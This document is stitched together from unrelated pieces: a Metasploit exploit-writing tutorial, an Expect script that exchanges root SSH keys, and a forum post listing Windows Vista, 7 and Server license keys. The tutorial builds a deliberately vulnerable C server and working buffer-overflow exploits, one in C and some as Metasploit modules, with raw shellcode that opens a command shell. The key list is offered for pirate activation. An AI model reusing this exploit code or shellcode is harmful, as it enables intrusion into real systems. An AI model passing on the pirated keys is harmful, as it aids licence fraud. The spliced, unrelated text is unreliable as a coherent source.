We use setg and not set as we want the payload to be saved for ever. No point keying it in all the time. When we run the exploit command it starts the Bind Handler and then exits it. This handler is the guy that creates our payload. Setting the payload changes the prompt adding the name of the payload.

sub Exploit
{
$self= shift;
$shellcode   = $self->GetVar('EncodedPayload')->Payload;
print $shellcode;
}

Like the RHOST variable we have the EncodedPayload variable. This in turn has a Payload member that contains the payload. When we print it out we get the contents of the win32_bind payload.

msf z(win32_bind) > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf z(win32_reverse) > exploit
Error: Missing required option: LHOST
msf z(win32_reverse) > show options
Exploit and Payload Options
  Exploit:    Name      Default    Description
  Payload:    Name        Default    Description
  required    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
  required    LHOST                  Local address to receive connection
  required    LPORT       4321       Local port to receive connection

  Target: Targetless Exploit

We now change the PAYLOAD using the set command to win32_reverse. We get an error as this payload requires a LHOST variable. This is the IP address of the machine that the victim will connect back to. This is normally the machine that runs the exploit. Thus payloads can have their own parameters.


msf z(win32_reverse) > set LHOST 127.0.0.1
LHOST -> 127.0.0.1
msf z(win32_reverse) > exploit

We set the LHOST variable and now the exploit gives us another set of values. This is how we can tag on a payload to our exploit. Before continuing it is a good idea to unsetg all the variables that we have created so far.

package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}

msf z > check
[*] No check has been implemented for this module

Smallest program. Every exploit should have at least two functions, Exploit that gets called when we run the command Exploit and Check when we run the Check command. We get an error as we do not have a Check sub.

sub Check
{
print "In Check\n";
}

msf z > check
In Check

In the check function we are supposed to check whether the exploit can be run or not on the target machine. Thus we must first allow the user to run check where we should check whether the IP address of the target contains an environment that we can compromise. For example there is no point running a Unix exploit on a IP address running windows.

sub Check
{
$versionNum  = $self->GetVersion('127.0.0.1', 80);
print $versionNum . "\n";
}
sub GetVersion
{
$a = shift;
$b  = shift;
$c = shift;
print "$a, $b , $c" . "\n";
return 22;
}

msf z > check
Msf::Exploit::z=HASH(0x108ac9cc), 127.0.0.1 , 80
22

In the check function we call a sub that we have created GetVersion using the self variable. This is how we call entities that we have created within our exploit. We pass two parameters to our function GetVersion but as always perl functions do not take explicit parameters. We keep using shift to store the parameters into different variables. Thus $a gets the handle to our exploit, $b the 127.0.0.1 and $c the last parameter 80. The return value 22 gets stored in the versionNum variable. This is how we can accept and return values.

sub Check
{
$a = 'vijay';
if ($a =~ /^vijay$/)
{
print "String contains vijay\n";
}
if ($a =~ /^vijay1$/)
{
print "String contains vijay1\n";
}
}

msf z > check
String contains vijay

One of the strongest points of perl is that it has wonderful string operators. We set $a to vijay and  then compare it with vijay. The // encompass the string, the ^ means start of string and $ means the end of string. Thus in the first case a match is made as our string contains vijay, In the second case we are checking for vijay1 which is not present in $a.

sub Check
{
$a = 'vijay mukhi';
if ($a =~ /vijay/)
{
print "String contains vijay\n";
}
$a = 'vijay mukhi';
if ($a =~ /^vijay$/)
{
print "String contains vijay\n";
}
}

msf z > check
String contains vijay

In the next case we remove the ^ and $ from the first so it matches as there is vijay in the string $a. However the second one does not match as we are checking for a exact match vijay. If we remove the $ from the second condition the strings will match as the $a string starts with vijay.

sub Check
{
$a = "\\vijay\\\n";
print $a;
}

msf z > check
\vijay\

Whenever we want to send a single \ over we have to send two \\ over. This is because for the “” the backslash is a reserved character.

package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
};
$advanced = {
'SizeOfFragment' => [100,'Size of Fragments']
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced});
return($self);
}
sub Check
{
$self = shift;
$a = $self->GetVar('SizeOfFragment');
print $a . "\n";
}

msf z > show advanced
Exploit Options
  Exploit (Msf::Exploit::z):
  --------------------------
  Name:     SizeOfFragment
  Default:  100
    Size of Fragments
msf z > check
100

The metasploit framework defines two types of options, basic or Info and advanced. The new method is actually called with two arrays, a Info array and an Advanced array. The idea of options is to customize the exploit. What the designers had in mind was that basic option should be placed in the Info array and the more advanced in the Advanced array. Thus the advanced array has the just the value and the string to be displayed. When we execute show advanced we get only the advanced options. Here we see the Name, a value and the help label. In our check function we use the same GetLocal to give us the single value and not an array so that we could access the label. There is no other difference between advanced and info. Info has lots of other members, advanced only the variables. The same set command sets the value of the variables. To sum it up, options that a normal user would not use place them in the advanced array.

package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'Targets' => [
['Windows 2000 sp 1', 10],
['Windows 2000 sp 4', 12]
]
};
$advanced =
{
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced});
return($self);
}
sub Check
{
$self = shift;
$target_idx = $self->GetVar('TARGET');
$target = $self->Targets->[$target_idx];
$self->PrintLine(sprintf("We are targeting %s at %04x\n",$target->[0], $target->[1]));
}

msf z > show targets
Supported Exploit Targets
   0  Windows 2000 sp 1
   1  Windows 2000 sp 4
msf z > set TARGET 1
TARGET -> 1
msf z > check
We are targeting Windows 2000 sp 4 at 000c

We start with creating our good old Targets array keeping in mind that we have an array of arrays and hence we need the [] brackets. The show targets command show us our two targets. We then set the target variable to 1 and when we run check, the target_idx member gets set to 1. The target variable becomes the entire second array as Targets represents the array, the [1] gives us access to the first member. Whenever we see target->[0] we can access the first member and so on. This is done a little while ago but we just wanted to refresh your memory. We are now printing the two values in the array to tell the user what we are up to. The only problem is that we would like to print the second value 12 as a hex digit in a width of 4 .Here is where we use the sprintf function that has the same syntax as sprintf of C. We use %04x where the 0 denotes padding of zeros if the width is not 4. This is how we can format our output. The above line is a standard in all exploits that tell the user what is going on, on  which targets.

package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
};
$advanced =
{
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced});
return($self);
}
sub Check
{
$self = shift;
$self->aaa(1,2,3);
}
sub aaa
{
shift;
($a, $b , $c ) = @_;
print("$a $b $c\n");
}

msf z > check
1 2 3

It really takes a long time to learn perl. Here we have a sub aaa that gets called with 3 parameters. In the sub we get 4 parameters and the first shift throws away the handle to the module. The last program used multiple shifts to handle the parameters. Experienced perl programmers would scoff at such code. Thus we need a better way that would impress the pros. The @_ variable has the entire array stored in in and because we have 3 variables on the left they get set with the three parameters. Remove the brackets and all hell breaks loose. This is how in a single line we can store the entire set of parameters.

sub Check
{
$a = 'Vijay';
$b = substr($a, 1, 3);
print $b . "\n";
}

msf z > check
ija

All environments all over the world offer us a substr function that gives us part of a string. This function wants the string as the first parameter $a, the starting point in the string as the second 1 and the length of the string. Thus we get the three bytes starting from I as counting starts from 0 and not 1. The string ija is stored in variable $b.

package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'UserOpts' =>
{
'RPORT' => [1, 'PORT', 'The target port', 41523],
}
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info});
return($self);
}
sub Exploit
{
$self = shift;
return if $self->GetVar('RPORT') != 80 ;
print "hi\n";
}

msf > use z
msf z > exploit

msf z > set RPORT 80
RPORT -> 80
msf z > exploit
hi

We create a user variable RPORT and set it to a very large value. We then place a conditional return statement that only acts a return if the variable RPORT has a value other than 80. Thus initially the value is 41523 and hence we get no output. Using the set command to set its value to 80 displays hi. We use the return if whenever we want to quit out of our code if a certain condition is not met with.

After learning all about perl and the Metasploit framework we will now start writing our own exploits with it. There are many operating systems today in use with myriad service packs. Thus there is a very small probability that the exploit and vulnerability that we use will be the same that you have access to. Thus lets us now create a server that has a buffer overflow and lets write an exploit that will overflow that buffer. On our website we have a tutorial on buffer overflow so we request  you to read that first. For some reason thanks to the winpcap driver that we all use, the same machine cannot be used for both exploit and vulnerability.  We cannot use localhost any more. Thus we connect two computers today, the one we work on is IP address 70.0.0.10 and the other one 70.0.0.2. We run the server on our machine 70.0.0.10.  Let us explain the server program first.

Server.c
#include
SOCKET s,s1;
struct sockaddr_in A,A1;
int d ;
WSADATA ws;
int main()
{
char buf[8];
WSAStartup(0x202,&ws);
s = socket(AF_INET, SOCK_STREAM, 0);
printf("s=%d\n",s);
A.sin_family = AF_INET;
A.sin_port = htons(2000);
A.sin_addr.s_addr = INADDR_ANY;
d = bind(s, (struct sockaddr *)&A, sizeof(A));
printf("d=%d\n");
listen(s, 5);
d = sizeof(A1);
s1 = accept(s, &A1, &d);
printf("s1=%d\n",s1);
recv(s1, buf, 4096,0);
}

This is a simple server that binds to port 2000 and accepts any IP address. The recv function accepts up to 4096 bytes of data in an array buf. The only problem is that our buf array is 8 bytes long. This is how we will over flow buf using our client program.

Client.c
#include
SOCKET s;
struct sockaddr_in A;
int d ;
WSADATA ws;
char aa[1000];
int main()
{
WSAStartup(0x202,&ws);
s = socket(AF_INET, SOCK_STREAM, 0);
printf("s=%d\n",s);
A.sin_family = AF_INET;
A.sin_port = htons(2000);
A.sin_addr.s_addr = inet_addr("70.0.0.10");
connect(s, &A, sizeof(A));
strcpy(aa,"AAAAAAAAAAAA");
aa[12] = 0x8c;
aa[13] = 0xff;
aa[14] = 0x12;
aa[15] = 0x00;
aa[16] = 0x00;
aa[17] = 0x00;
aa[18] = 0x00;
aa[19] = 0x00;
aa[20] = 0xcc;
send(s, aa , strlen(aa)+9,0);
}

In the client program we connect to the server running on port 2000 IP address 70.0.0.10. We then send 12 A’ to the server. The first 8 will snugly fit into the array buf, the next 4 will overwrite ebp and the next four will have0x0012ff8c. We must learn to read backwards. Then we will have four 0’s and then a CC which happens to the op code for int 3. If we see the stack at this time, under windows the stack begins at the same place each time the program is run. We have compiled our code with Visual C++ 6.0 and not Visual Studio .net. The newer compilers add code to detect and thwart buffer overflow. The key point is that each time we run our program, the value 0x0012ff8c will be moved into eip at the end of our function. Eip will now execute code beginning at this location at the end of our function main. Here starts the code that we have send from the net. Thus when we run the client on 70.0.0.2,  on our server machine we get the breakpoint message box. Lets now see how the Metasploit framework make sit easy to write a buffer overflow.

Z1.pm
package Msf::Exploit::z1;
use base "Msf::Exploit";
$info =
{
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
$s = Msf::Socket::Tcp->new('PeerAddr'  => '70.0.0.10', 'PeerPort'  => 2000);
$req = "AAAAAAAAAAAA" . "\x8c\xff\x12\x00" . "\x00\x00\x00\x00" . "\xcc" ;
$s->Send($req);
}

We first run the server on 70.0.0.10 and then run the exploit z1 as use z1, exploit on 70.0.0.2. What we see is the now familiar breakpoint. The info array need not be there. In the exploit function we create a new Tcp object with 70.0.0.10 as the Ip address and 2000 as the port number. We will later like good guys use variables to set these values. We then create a string req with the 12 A’s, the stack location, 4 zeroes and the CC opcode. We then use the Send function to send our string over. See how simple it is to write an exploit using the framework.

Z2.pm
package Msf::Exploit::z2;
use base "Msf::Exploit";
$info =
{
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
$s = Msf::Socket::Tcp->new('PeerAddr'  => '70.0.0.10', 'PeerPort'  => 2000);
$req = "AAAAAAAAAAAA" . "\x8c\xff\x12\x00" . "\x00\x00\x00\x00" ;
$req .= "\x55\x8b\xec\x51\xc7\x45\xfc\x63\x6d\x64\x00\x6a\x05\x8b\xc5\x83\xe8\x04";
$req .= "\x50\xb8\x92\x74\x59\x7c\xff\xd0\x6a\x00\xb8\x72\x69\x59\x7c\xff\xd0";
$s->Send($req);
}

When we once again run the server as server on 70.0.0.10 and use z2, exploit on the client 70.0.0.2 we see a dos box open up on the server. This as of now makes no sense as the dos box should open up on the client and not the server. The point is that instead of running a CC or the breakpoint interrupt we are running code that opens up a dos box. If the code does not work on your machine, you have not read our tutorial and need to change two address in the above code. This code is difficult to write and understand and that is why we call it shell code.

For some reason when we use his payloads like win32_bind etc nothing works. We asked this question on the mailing lists and we got no answer. Hence we stop here and hope you like the manner we have simplified the Metasploit framework.



WebRepOverall rating

Script to exchange ssh keys

Script to exchange ssh keys

 1
#!/usr/bin/perl
 2
use Expect;
 3
#USAGE:  ssh-key-exchange.pl   

 4
 5 my $ip =  $ARGV[0
];
 6 my $login = $ARGV[ 1
];
 7 my $password = $ARGV[2
 ];
 8 my $private_key='/root/.ssh/id_rsa
 ';
 9 my $public_key='/root/.ssh/id_rsa.pub
 ';
10 my $authorisedkeyfile='/root/.ssh/authorized_keys
 ';
11 my $timeout =
10;
12 my  $aft =
new Expect;

13
14
#Generate the public and private key on the local m/c A
15 if(!(( -e $public_key ) &&( -e
$private_key )))  {
16     print "Generating the Public and Private Key:\n
";
17     @result=`ssh-keygen -t rsa -f /root/.ssh/id_rsa -P ""
`;
18    
#print @result;

19 }
20
#Copy the file to m/c B
21 print "Copying Public Key from A to B.\n
 ";
22 $aft->spawn("scp $public_key  $login\@$ip:/tmp/
");
 23 $aft->expect($timeout,[ qr'\? $' ,     sub { my $fh=shift; $fh->send("yes\n
"); exp_continue; } ],
 24                       [ 'Password: $',sub {  my $fh=shift;$fh->send("$password \n
");exp_continue;}  ],
25
#                      '-re','\# $'    

 26                   );
27 $aft
->do_soft_close();

28

29 
30
#Add Keys to authorised keys in B
31 print " Adding Keys to authorised key in B with IP=$ip,[ $login $password  ] \n
";
32 my $aft =
new Expect;
33 $aft->log_file("/tmp/expect_log" ,"w
");
34 $aft->spawn( "ssh $login\@$ip") or  die "Cannot ssh to the machine \n
";
35  $aft->expect($timeout,[ qr'\? $',      sub { my $fh=shift;$fh ->send("yes\n
"); exp_continue; } ],
36                       [  'Password: $',sub { my  $fh=shift;$fh->send("$password\n
");exp_continue;}  ],
37                        '-re', '\# $
'

38                   );
39 $aft ->send("touch $authorisedkeyfile\n
");
 40 $aft->expect($timeout,'-re' ,'\# $
');
41 $aft->send( "cat /tmp/id_rsa.pub >> $authorisedkeyfile\n
");
42  $aft->expect($timeout,'-re', '\# $
');
43 $aft->send(" exit\n
");
44 $aft
->do_soft_close();
 45 

#OS|Type|Brand|Key

Hi Friends if u r facing problem on activation of windows 7 Here is Original License Key for all Brand...It will help u to activate window 7 online...

##################
#OS|Type|Brand|Key
##################
Vista|Ultimate|Acer|3YDB8-YY3P 4-G7FCW-GJMPG-VK48C
Vista|Ultimate|Advent|39MVW-K8 KKQ-BGJ9B-24PMW-RYQMV
Vista|Ultimate|Alienware|7QVFM -MF2DT-WXJ62-XTYX3-P9YTT
Vista|Ultimate|Asus|6F2D7-2PCG 6-YQQTB-FWK9V-932CC
Vista|Ultimate|Dell|2QBP3-289M F-9364X-37XGX-24W6P
Vista|Ultimate|DixonXP|6JPQR-4 G364-2B7P7-83FXW-DR8QC
Vista|Ultimate|Gateway|6P8XK-G DDTB-X9PJQ-PYF36-G8WGV
Vista|Ultimate|Hedy|7R2C3-DWCB G-C8G96-MPT8T-K37C7
Vista|Ultimate|HP|23CM9-P7MYR- VFWRT-JGH7R-R933G
Vista|Ultimate|Lenovo|24J6Q-YJ JBG-V4K4Q-2J8HY-8HBQQ
Vista|Ultimate|OQO|C4QGV-XHYYT -9PW8R-DCFTQ-FBD6M
Vista|Ultimate|Toshiba|33G3W-J Y3XQ-CQQ7C-TG96R-R6J6Q
Vista|Ultimate|Sony|2KKTK-YGJK V-3WMRR-3MDQW-TJP47
Vista|Business|Acer|2TJTJ-C72D 7-7BCYH-FV3HT-JGD4F
Vista|Business|Asus|72PFD-BCBK 8-R7X4H-6F2XJ-VVMP9
Vista|Business|Dell|368Y7-49YM Q-VRCTY-3V3RH-WRMG7
Vista|Business|Fujitsu|4C3CM-H 3RXM-VBMVQ-K8RHX-RTFX8
Vista|Business|Gateway|9GK24-B JJPV-93JB4-9CD3T-QTHDD
Vista|Business|HP|2Q2WM-VCB98- 8C6BG-C9BT2-3XDRY
Vista|Business|Lenovo|2YRV9-YC Y3F-FRJ4T-BKD6B-C47PP
Vista|Business|MSI|2X4F8-Y4QGK -Y8RTT-CK6PB-M8X92
Vista|Business|NEC|22QYD-YQFQG -4P9GY-DRVR3-RCFDV
Vista|Business|OQO|KBK7F-XCVK4 -9W477-GPFVC-YXFDM
Vista|Business|Panasonic|246PH -B8XYM-B7DFM-RR8PM-JRHXC
Vista|Business|Sony|3W2Y2-GRRY B-VH76X-KPDXX-XFJ4B
Vista|Business|Toshiba|38MK6-4 QYC6-GJQQX-9DYQ4-H9MQD
Vista|BusinessN|Acer|2434H-HFR M7-BHGD4-W9TTD-RJVCH
Vista|HomeBasic|Acer|2W7FD-9DW CB-Q9CM8-KTDKK-8QXTR
Vista|HomeBasic|Asus|762HW-QD9 8X-TQVXJ-8RKRQ-RJC9V
Vista|HomeBasic|Benq|7R997-DXY DR-YGCR3-RHVDP-T8TKX
Vista|HomeBasic|CHS|2QM7G-GTFJ 4-2DTTG-R73YR-W3D8G
Vista|HomeBasic|Dell|3YMR2-WMV 49-4WD8X-M9WM7-CH4CG
Vista|HomeBasic|Fujitsu|4G8P7- TVW66-Y3H3V-C4Q4J-CQR2B
Vista|HomeBasic|Gateway|7Q3BC- 897QP-6HVMF-TTJ34-P92J4
Vista|HomeBasic|Gericom|MDRBF- FKHJB-6J8RV-P4GKQ-G6BR8
Vista|HomeBasic|Gigabyte|889T3 -F4VGX-QK4V7-JH76R-3HHRC
Vista|HomeBasic|HP|2VX48-BVXT6 -GD2PK-BD3R2-44MV3
Vista|HomeBasic|Ksystem-Irbis| J2QKK-V8M3X-WRPPT-FBW4B-FQ6FP
Vista|HomeBasic|Lenovo|2WP98-K HTH2-KC7KG-4YR37-H8PHC
Vista|HomeBasic|LG|6DT3K-TCY4G -Y2VK9-T8J3T-2RGT7
Vista|HomeBasic|Mecer|C3MXB-T6 PGC-2M2XV-C6PRX-TPW79
Vista|HomeBasic|Medion|3XFY9-7 GTXV-93RXP-V62MQ-84WP6
Vista|HomeBasic|NEC|2432B-Q9RG P-VT9CK-64JFP-X6XVT
Vista|HomeBasic|Packard Bell|4GW2B-QCB6W-BWTVG-2DDKY-K RDMH
Vista|HomeBasic|Rover|BMHBK-PJ D8J-WDWGY-Q4D6Q-46YJP
Vista|HomeBasic|Samsung|27WDG- 2G9G2-BTVMF-W4KCX-9F8PX
Vista|HomeBasic|Sony|4DWY4-M6V H9-Y6FX6-D2H3V-3PXM9
Vista|HomeBasic|Toshiba|4DV48- MFJR8-VRW92-3VTYM-HBTPB
Vista|HomeBasic|Trigem|2YY8K-6 KVM4-3DTT6-XRFHK-RYYDG
Vista|HomeBasicN|Acer|22TC9-RD MDD-VXMXD-2XM2Y-DT6FX
Vista|HomePremium|Acer|2TYBW-X KCQM-XY9X3-JDXYP-6CJ97
Vista|HomePremium|Alienware|D9 CRD-R8YYQ-VYG3W-YG4FK-2CXRF
Vista|HomePremium|Asus|8XPM9-7 F9HD-4JJQP-TP64Y-RPFFV
Vista|HomePremium|Dell|4GPTT-6 RYC4-F4GJK-KG77H-B9HD2
Vista|HomePremium|DixonXP|7VJM Y-XWBMV-T3PCK-3FRWY-KKMRQ
Vista|HomePremium|Everex|BH3M9 -MQPD8-PTPDK-T6DWK-B2XFW
Vista|HomePremium|Founder|C6KM 8-8JDBT-QBRM8-2MGFH-XH7QY
Vista|HomePremium|Fujitsu|6M66 G-C2BGD-XGBBV-2BHKV-C9KM3
Vista|HomePremium|Gateway|6DX2 X-QR7XB-3RBY2-BGQ2R-DR9M6
Vista|HomePremium|HP|HW7V9-XYT 4W-PFR9Q-2DKGJ-RR4TD
Vista|HomePremium|iQon|6R99P-3 HY62-7XR3F-WGP2T-HKCB9
Vista|HomePremium|Kohjinsha|HR CXG-RQPBQ-YBP92-KFFRY-JKQQ3
Vista|HomePremium|Ksystem-Irbis|7QVBM-X4KG7-QCWDP-YC8PQ-PXKH 8
Vista|HomePremium|Lenovo|34BKK -QK76Y-WWR7C-QF2M7-2TB37
Vista|HomePremium|LG|73JC4-PR3 R6-9DKYC-FDG3K-3FTT3
Vista|HomePremium|Medion|4FG94 -MMYPT-H2QD2-V4DCP-X7QB8
Vista|HomePremium|MeshPC|HR3TD -CH9JD-CT8WF-X948R-C3QR3
Vista|HomePremium|MSI|86C2J-2M 84W-HBMRQ-GBJWJ-VPTRM
Vista|HomePremium|NEC|22CTR-JF KJJ-BMXQK-XKXBC-C8R98
Vista|HomePremium|Optima|863XK -7RW2B-6R8CR-4FYQV-3FTW8
Vista|HomePremium|Packard Bell|6PFJK-WKXQR-9Q27C-6CWD7-M Q3CQ
Vista|HomePremium|Paradigit|6D X4V-3CJX6-97XGD-KW4C2-PVRRK
Vista|HomePremium|Powerspec|CK 82T-QVTHF-8HGMF-9F3G9-FJH92
Vista|HomePremium|Quanmax|88XK M-J69QV-VB9M9-QCM66-647KW
Vista|HomePremium|Samsung|2MQH 8-77KBM-PRTT7-HVDWW-DCXVT
Vista|HomePremium|Sony|6JWV3-8 43DD-4GV68-6D8JB-G6MF9
Vista|HomePremium|Targa|6VJ7B- 3KTJH-H3DDQ-7JD7G-26VMG
Vista|HomePremium|TCL|BH626-XT 3FK-MJKJH-6GQT2-QXQMF
Vista|HomePremium|Toshiba|6DG3 Y-99KMR-JQMWD-2QJRJ-RJ34F
Vista|HomePremium|Velocity|GCH CQ-WTYXJ-GDJBC-JYDCX-F9VXW
Vista|Starter|Acer|26VQB-RP3T9 -63FVV-VD7RF-H7M2Q
Vista|Starter|Lenovo|23Q4W-YQP HY-TY89Y-7Q3VX-W72KT
ServerV|ServerEnterprise|Dell| 26Y2H-YTJY6-CYD4F-DMB6V-KXFCQ
ServerV|ServerEnterpriseV|Dell |2P643-4GWD9-VCHR2-FD99Y-6VYKW
ServerV|ServerSBSPrime|Dell|BH FGK-YDHVJ-49M49-FT9B3-WKG8Y
ServerV|ServerSBSStandard|Dell |76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2
ServerV|ServerStandard|Dell|22 3PV-8KCX6-F9KJX-3W2R7-BB2FH
ServerV|ServerStorageStandard|Dell|264YC-6W6Q8-2W6M9-Q77M8-Q YD4J
Server7|ServerEnterprise|Dell| BKCJJ-J6G9Y-4P7YF-8D4J7-7TCWD
Server7|ServerEnterprise|Fujitsu|22P9W-86F2J-JTHXK-FMFQ4-2DQ DR
Server7|ServerSBSStandard|HP|2 QWT9-FMJ8G-99KPY-4MRQJ-XXX3W
Server7|ServerSBSStandard|IMB| 33QFH-PQK6J-MVFJX-JQQ3F-KF6C3
Server7|ServerStandard|Dell|D7 TCH-6P8JP-KRG4P-VJKYY-P9GFF
Server7|ServerStandard|Fujitsu |28DQD-GJYMB-HGWV8-V3849-XFT2Q
Server7|ServerWinFoundation|Dell|VMYRB-8BRVQ-KXWFF-334J3-F2W HJ
7|Ultimate|Acer|FJGCP-4DFJD-GJ Y49-VJBQ7-HYRR2
7|Ultimate|Alienware|VQ3PY-VRX 6D-CBG4J-8C6R2-TCVBD
7|Ultimate|Asus|2Y4WT-DHTBF-Q6 MMK-KYK6X-VKM6G
7|Ultimate|Dell|342DG-6YJR8-X9 2GV-V7DCV-P4K27
7|Ultimate|Fujitsu|9CW99-79BBF -D4M3X-9BK9M-4RPH9
7|Ultimate|HP|MHFPT-8C8M2-V948 8-FGM44-2C9T3
7|Ultimate|Lenovo|6K2KY-BFH24- PJW6W-9GK29-TMPWP
7|Ultimate|NEC|2WX6M-X2HKM-86X 8X-2QD44-F3FGJ
7|Ultimate|Samsung|49PB6-6BJ6Y -KHGCQ-7DDY6-TF7CD
7|Ultimate|Sony|YJJYR-666KV-8T 4YH-KM9TB-4PY2W
7|Ultimate|Stone|76MTG-QMQJQ-4 6DQR-CHRBB-7K3HD
7|Ultimate|Tarox|4BRY2-6W9VH-9 CM6R-GPKRY-HHVCY
7|UltimateE|HP|278MV-DKMGJ-F3P 9F-TD7Y3-W6G3M
7|Professional|Acer|YKHFT-KW98 6-GK4PY-FDWYH-7TP9F
7|Professional|Alienware|4CFBX -7HQ6R-3JYWF-72GXP-4MV6W
7|Professional|Asus|2WCJK-R8B4 Y-CWRF2-TRJKB-PV9HW
7|Professional|BGH e-Nova|4872B-B4R7J-QWCFR-YH962 -RGDRW
7|Professional|CCE|D8VYT-828P6 -7V77D-P8VV7-CHC4M
7|Professional|Dealin|6BJ27-DV BFF-VKQC8-7JPQP-TJKYY
7|Professional|Dell|32KD2-K9CT F-M3DJT-4J3WC-733WD
7|Professional|Fujitsu|PT9YK-B C2J9-WWYF9-R9DCR-QB9CK
7|Professional|HCL|2QTV2-3CMPP -FQBYK-GRD62-D7XMW
7|Professional|HP|74T2M-DKDBC- 788W3-H689G-6P6GT
7|Professional|Kraftway|32HPJ- 4XRDR-424C8-DYQM9-GM768
7|Professional|Lenovo|237XB-GD J7B-MV8MH-98QJM-24367
7|Professional|Mecer|2WGY7-J3J QT-78CF9-J6DHQ-DJTQW
7|Professional|MSI|2W3CX-YD4YJ -DF9B2-V27M6-77GMF
7|Professional|Quanmax|84TBR-V 3TCM-DC73Q-TDRQ7-WHPJ4
7|Professional|Samsung|GMJQF-J C7VC-76HMH-M4RKY-V4HX6
7|Professional|Sony|H9M26-6BXJ P-XXFCY-7BR4V-24X8J
7|Professional|STEG|7RQGM-4BJB D-GM2YY-R2KTT-43HG8
7|Professional|Stone|4FXT2-THH QK-B7293-VYHKX-3DRPD
7|Professional|Tarox|72X79-RQP FF-YGK82-7FF8M-PX4XB
7|Professional|Toshiba|2V8P2-Q KJWM-4THM3-74PDB-4P2KH
7|Professional|Wortmann|6JKVQ- WJTWW-JVPRB-77TGD-2DV7M
7|ProfessionalE|HP|P42PH-HYD6B -Y3DHY-B79JH-CT8YK
7|HomePremium|Acer|VQB3X-Q3KP8 -WJ2H8-R6B6D-7QJB7
7|HomePremium|Advent|38JTJ-VBP FW-XFQDR-PJ794-8447M
7|HomePremium|Alienware|V3Y2W- CMF9W-PGT9C-777KD-32W74
7|HomePremium|Asus|2QDBX-9T8HR -2QWT6-HCQXJ-9YQTR
#7|HomePremium|Asus Eee|7JQWQ-K6KWQ-BJD6C-K3YVH-DV QJG
7|HomePremium|Dealin|8YDX9-B7M MG-82XD9-V88G9-MR92T
7|HomePremium|Dell|6RBBT-F8VPQ -QCPVQ-KHRB8-RMV82
7|HomePremium|Fujitsu|C6MHH-TR RPT-74TDC-FHRMV-XB88W
7|HomePremium|Genuine|2V36J-4R K8B-GW27Q-4DXPG-RQP78
7|HomePremium|Gigabyte|3743C-T 6892-B4PHM-JHFKY-4BB7W
7|HomePremium|HCL|39QDH-D7MHH- WDMTD-TM2R9-KM7DB
7|HomePremium|HP|4FG99-BC3HD-7 3CQT-WMF7J-3Q6C9
7|HomePremium|Kraftway|6H6K2-Y 6CVC-PR6BK-WQ2WP-TJVJ9
7|HomePremium|Lenovo|27GBM-Y4Q QC-JKHXW-D9W83-FJQKD
7|HomePremium|LG|38GRR-KMG3D-B TP99-TC9G4-BBDJJ
7|HomePremium|Medion|2P2P9-CM3 F8-FTV6P-PC7CX-8TFF7
7|HomePremium|MSI|4G3GR-J6JDJ- D96PV-T9B9D-M8X2Q
7|HomePremium|Packard Bell|VQB3X-Q3KP8-WJ2H8-R6B6D-7 QJB7
7|HomePremium|Paradigit|J84PD- BHP6K-FCHBJ-7PHWD-76MXK
7|HomePremium|Philco|TTJQ7-4PF JC-6JFJ8-B22VD-VXW88
7|HomePremium|Samsung|CQBVJ-9J 697-PWB9R-4K7W4-2BT4J
7|HomePremium|Shuttle|C3V4C-6Y 6WM-DGRM9-QJG82-8K3FP
7|HomePremium|Siragon|HWDFB-YV FG4-3TJ7F-Q3WMT-7B6PH
7|HomePremium|Sony|H4JWX-WHKWT -VGV87-C7XPK-CGKHQ
7|HomePremium|Stone|86DTG-C7PD C-JDHKH-PGDM7-V9FVY
7|HomePremium|Tarox|BWHCT-BWJP G-H9PV3-4V4WT-9978X
7|HomePremium|Toshiba|6B88K-KC CWY-4F8HK-M4P73-W8DQG
7|HomePremium|Viewsonic|C23T3- 9F2T2-FPWBM-XYMW2-272J9
7|HomePremium|ZT Systems|83BJB-QKYF3-H9K4M-DV32 X-8X2XD
7|HomePremiumE|HP|TD77M-HH38J- FBCB8-8QX7Y-P2QH3
7|HomeBasic|Acer|MB4HF-2Q8V3-W 88WR-K7287-2H4CP
7|HomeBasic|Asus|89G97-VYHYT-Y 6G8H-PJXV6-77GQM
7|HomeBasic|Dealin|6M78P-JJRQP -9C4RX-RPK7G-3VTH3
7|HomeBasic|Dell|36T88-RT7C6-R 38TQ-RV8M9-WWTCY
7|HomeBasic|Founder|7WGMV-QFYX X-64DCG-HQFWM-DWGKY
7|HomeBasic|Fujitsu|8W3JQ-BP2H Y-F47QX-6CQ94-2BKQB
7|HomeBasic|HCL|2Q4QP-8P4MD-47 YBP-7TXX9-FKDRM
7|HomeBasic|HP|DX8R9-BVCGB-PPK RR-8J7T4-TJHTH
7|HomeBasic|Itautec|239PK-QV6B M-6BX3V-KH2BD-R3VTY
7|HomeBasic|Kraftway|2YB9V-B4R 3R-D8Y6R-CB7DB-J6YY7
7|HomeBasic|KSystems|82P6X-KGH 24-FCPXC-XQKC9-74KC8
7|HomeBasic|Lenovo|22MFQ-HDH7V -RBV79-QMVK9-PTMXQ
7|HomeBasic|MSI|2TY7W-H4DD4-MB 62F-BD9C3-88TM6
7|HomeBasic|Positivo|4FW6G-J7F R9-MHWGW-JDXP6-QQH89
7|HomeBasic|Samsung|2P6PB-G7YV Y-W46VJ-BXJ36-PGGTG
7|HomeBasic|Sony|YV7QQ-RCXQ9-K TBHC-YX3FG-FKRW8
7|HomeBasic|Stone|6DG93-2G6YJ- VHRX8-3YRWX-K4HWP
7|HomeBasic|Tongfang|9DBMT-GXR WM-6Q9Y3-WMYM8-FJCBW
7|HomeBasic|Toshiba|9H4FH-VD69 Y-TGBD2-4PM4K-DRMMH
7|Starter|Acer|RDJXR-3M32B-FJT 32-QMPGB-GCFF6
